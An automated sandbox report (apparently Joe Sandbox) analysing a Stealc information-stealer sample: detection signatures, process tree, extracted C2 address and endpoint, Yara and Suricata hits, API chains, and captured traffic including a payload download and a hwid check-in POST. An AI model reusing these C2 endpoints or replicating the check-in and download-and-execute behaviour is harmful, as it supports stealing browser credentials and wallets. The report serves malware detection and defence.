Edit tour

Windows Analysis Report
4h1Zc12ZBe.exe

Overview

General Information

Sample name:	4h1Zc12ZBe.exe renamed because original name is a hash value
Original sample name:	2a862d97cc67da2511680862033b5228.exe
Analysis ID:	1497246
MD5:	2a862d97cc67da2511680862033b5228
SHA1:	2a7e8253a766bb23ab0659f45e1a15c1b914238b
SHA256:	eba7df179c830bbead2a78934f2bf3e77fcc4aacf90b69c5be49a2fa68adf8b4
Tags:	exeStealc
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking locale)

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for dropped file

Searches for specific processes (likely to inject)

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found evaded block containing many API calls

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Use Short Name Path in Command Line

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

4h1Zc12ZBe.exe (PID: 5352 cmdline: "C:\Users\user\Desktop\4h1Zc12ZBe.exe" MD5: 2A862D97CC67DA2511680862033B5228)

169F.tmp.exe (PID: 6480 cmdline: "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe" MD5: D1B7450967D42B98290D97DD1A8CFA6D)

WerFault.exe (PID: 7556 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6480 -s 1068 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.151/edd20096ecef326d.php"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1459945134.000000000084E000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0xa0af:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.1459848007.00000000007E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
Process Memory Space: 169F.tmp.exe PID: 6480	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: 169F.tmp.exe PID: 6480	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Sigma Signatures

System Summary

Sigma detected: Use Short Name Path in Command Line

Source: Process started

Author: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\169F.tmp.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\169F.tmp.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\169F.tmp.exe, ParentCommandLine: "C:\Users\user\Desktop\4h1Zc12ZBe.exe", ParentImage: C:\Users\user\Desktop\4h1Zc12ZBe.exe, ParentProcessId: 5352, ParentProcessName: 4h1Zc12ZBe.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\169F.tmp.exe" , ProcessId: 6480, ProcessName: 169F.tmp.exe

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.7 - Destination IP: 62.204.41.151

Timestamp:	2024-08-22T09:24:19.080306+0200
SID:	2044243
Severity:	1
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.7 - Destination IP: 62.204.41.151

Timestamp:	2024-08-22T09:24:01.488518+0200
SID:	2803274
Severity:	2
Source Port:	49700
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UH - Source IP: 192.168.2.7 - Destination IP: 172.67.167.249

Timestamp:	2024-08-22T09:24:00.412460+0200
SID:	2803274
Severity:	2
Source Port:	49699
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/ScreenUpdateSync.exe	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/edd20096ecef326d.phpRC)L	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/ows	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1vM485h	Avira URL Cloud: Label: malware
Source: https://iplogger.co/L	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1vM485vector	Avira URL Cloud: Label: malware
Source: http://62.204.41.151	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1vM485#	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/edd20096ecef326d.phpttv	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/edd20096ecef326d.php	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/edd20096ecef326d.phpFC%L	Avira URL Cloud: Label: malware
Source: https://iplogger.co/1vM485	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/0$	Avira URL Cloud: Label: malware
Source: https://iplogger.co/	Avira URL Cloud: Label: malware
Source: http://62.204.41.151/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1312380
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Avira: detection malicious, Label: HEUR/AGEN.1312380

Found malware configuration

Source: 00000003.00000002.1459972302.000000000087A000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.151/edd20096ecef326d.php"}

Multi AV Scanner detection for domain / URL

Source: http://62.204.41.151/ScreenUpdateSync.exe	Virustotal: Detection: 20%	Perma Link
Source: http://62.204.41.151/ows	Virustotal: Detection: 13%	Perma Link
Source: http://62.204.41.151/ScreenUpdateSync.exe.exeupload.prtscreen.app/upload.php----BOUNDARYBOUNDARY----	Virustotal: Detection: 13%	Perma Link
Source: http://62.204.41.151	Virustotal: Detection: 18%	Perma Link
Source: http://62.204.41.151/edd20096ecef326d.php	Virustotal: Detection: 17%	Perma Link
Source: http://62.204.41.151/	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Virustotal: Detection: 34%			Perma Link
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Virustotal: Detection: 34%			Perma Link

Multi AV Scanner detection for submitted file

Source: 4h1Zc12ZBe.exe	Virustotal: Detection: 23%			Perma Link
Source: 4h1Zc12ZBe.exe	ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00418940
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	3_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_00407280
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00409B10
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_00409BB0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E74E7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	3_2_007E74E7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EC8C7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,	3_2_007EC8C7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E9D77 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_007E9D77
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E9E17 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	3_2_007E9E17
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F8BA7 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_007F8BA7

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

Unpacked PE file: 3.2.169F.tmp.exe.400000.0.unpack

Source: 4h1Zc12ZBe.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 172.67.167.249:443 -> 192.168.2.7:49699 version: TLS 1.2

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe	Code function: 0_2_00430E37 FindFirstFileExW,	0_2_00430E37
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040DC50
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00414050 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	3_2_00414050
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040D8C0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040F4F0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040BCB0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004139B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_004139B0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040E270
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_0040EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040EB60
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401710
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004133C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	3_2_004133C0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_004143F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_004143F0
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F3C17 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_007F3C17
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EE4D7 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_007EE4D7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007E1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007E1977
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EEDC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_007EEDC7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F4657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007F4657
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F3627 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	3_2_007F3627
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007F42B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_007F42B7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EDEB7 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007EDEB7
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EF757 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_007EF757
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EDB27 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_007EDB27
Source: C:\Users\user\AppData\Local\Temp\169F.tmp.exe	Code function: 3_2_007EBF17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	3_2_007EBF17

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49713 -> 62.204.41.151:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.151/edd20096ecef326d.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 22 Aug 2024 07:24:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 22 Aug 2024 07:20:02 GMTETag: "59c00-620407cb4c50c"Accept-Ranges: bytesContent-Length: 367616Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ea b8 25 1d ae d9 4b 4e ae d9 4b 4e ae d9 4b 4e c1 af d5 4e bc d9 4b 4e c1 af e1 4e f0 d9 4b 4e c1 af e0 4e 8f d9 4b 4e a7 a1 d8 4e a7 d9 4b 4e ae d9 4a 4e d0 d9 4b 4e c1 af e4 4e af d9 4b 4e c1 af d1 4e af d9 4b 4e c1 af d6 4e af d9 4b 4e 52 69 63 68 ae d9 4b 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 36 3b 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 a2 03 00 00 2a 1b 00 00 00 00 00 13 49 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 24 00 00 04 00 00 c9 b2 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 a6 03 00 64 00 00 00 00 50 1e 00 f8 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 a6 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 32 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 a1 03 00 00 10 00 00 00 a2 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 81 1a 00 00 c0 03 00 00 76 01 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 de 05 00 00 50 1e 00 00 80 00 00 00 1c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.151Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFHHost: 62.204.41.151Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 46 41 30 46 31 39 46 32 39 38 34 31 33 34 30 30 39 33 31 39 36 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="hwid"6FA0F19F29841340093196------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="build"default------GCBGIIECGHCAKECAFBFH--

Source: Joe Sandbox View

IP Address: 62.204.41.151 62.204.41.151

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: iplogger.co

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49700 -> 62.204.41.151:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49699 -> 172.67.167.249:443

Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.151

Source: C:\Users\user\Desktop\4h1Zc12ZBe.exe

Code function: 0_2_00401F05 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00401F05

Source: global traffic	HTTP traffic detected: GET /1vM485 HTTP/1.1User-Agent: ShareScreenHost: iplogger.co
